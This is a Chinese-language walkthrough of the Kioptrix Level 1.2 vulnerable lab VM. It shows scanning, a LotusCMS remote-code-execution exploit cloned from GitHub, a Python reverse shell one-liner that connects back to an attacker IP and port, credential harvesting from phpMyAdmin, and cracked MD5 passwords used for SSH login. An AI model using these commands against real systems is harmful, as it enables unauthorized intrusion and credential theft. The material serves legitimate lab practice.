ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

kioprtix level 1.2

2021-12-09 22:03:56  阅读:187  来源: 互联网

标签:kioprtix 10.0 socket 登录 level dup2 1.2 os fileno


kioprtix level 1.2

存活探测+端口扫描

image-20211209203946394

访问80

image-20211209204053423

同时做一个目录扫描

发现

http://10.0.4.18/phpmyadmin/index.php

指纹识别

image-20211209205217428

cms漏洞查找

image-20211209205247480

测试代码执行,存在漏洞

反弹shell

github找到poc

git clone https://github.com/Hood3dRob1n/LotusCMS-Exploit

git clone https://github.com/Hood3dRob1n/LotusCMS-Exploit
cd LotusCMS-Exploit/
chmod 777 lotusRCE.sh
nc -lvp <port>
./lotusRCE.sh 10.0.4.18
<你的ip>
<刚才的port>
1

image-20211209211729394

交互的会话,采用再次反弹

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.0.4.10',5656));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

image-20211209212050160

寻找敏感信息

image-20211209212334755

image-20211209212537020

看到数据库账号和密码

登录phpmyadmin

image-20211209212629885

image-20211209212833943看到超管密码,测试无法ssh登录,估计是we端的

image-20211209213129371

还有一个

image-20211209213147142

md5解密下

image-20211209213214570

image-20211209213225815

starwars Mast3r

尝试ssh登录,成功登录

image-20211209213329410

image-20211209213800378

image-20211209213854999

登录后发现loneferrethome下有几个文件

查看

image-20211209214002653

这个应该就是提权的暗示了

百度教程

image-20211209215543062

image-20211209215530669

标签:kioprtix,10.0,socket,登录,level,dup2,1.2,os,fileno
来源: https://www.cnblogs.com/liyu8/p/15669492.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有